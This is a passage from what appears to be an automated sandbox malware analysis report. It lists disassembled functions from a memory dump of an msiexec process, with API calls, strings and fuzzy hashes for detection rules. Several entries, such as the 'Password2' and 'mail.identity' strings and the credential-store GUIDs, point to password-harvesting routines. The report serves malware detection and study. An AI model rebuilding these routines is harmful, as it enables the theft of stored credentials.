                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004092C0
                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              Strings
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscpymemset
                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                              • API String ID: 408644273-3424043681
                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                              Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpy
                                                              • String ID: Password2
                                                              • API String ID: 2600922555-1856559283
                                                              • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                              • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                              • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                              • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                              Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                              • API String ID: 2574300362-543337301
                                                              • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                              • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                              • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                              • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                              Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: rows deleted
                                                              • API String ID: 2221118986-571615504
                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                              Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                              • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                              • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                              • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                              • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp
                                                              • String ID:
                                                              • API String ID: 3384217055-0
                                                              • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                              • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                              • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                              • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                              Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004048C2
                                                              • memset.MSVCRT ref: 004048D6
                                                              • memset.MSVCRT ref: 004048EA
                                                              • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                              • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                              • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                              Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D2C2
                                                              • memset.MSVCRT ref: 0040D2D8
                                                              • memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • memset.MSVCRT ref: 0040D319
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __allrem.LIBCMT ref: 00425850
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                              • __allrem.LIBCMT ref: 00425933
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                              Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 3503910906-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C922
                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Message$MenuPostSendStringmemset
                                                              • String ID:
                                                              • API String ID: 3798638045-0
                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                              Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT(?), ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                              • _gmtime64.MSVCRT ref: 00411437
                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                              • strftime.MSVCRT ref: 00411476
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                              Memory Dump Source
                                                              • Source File: 00000013.00000002.2901905603.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
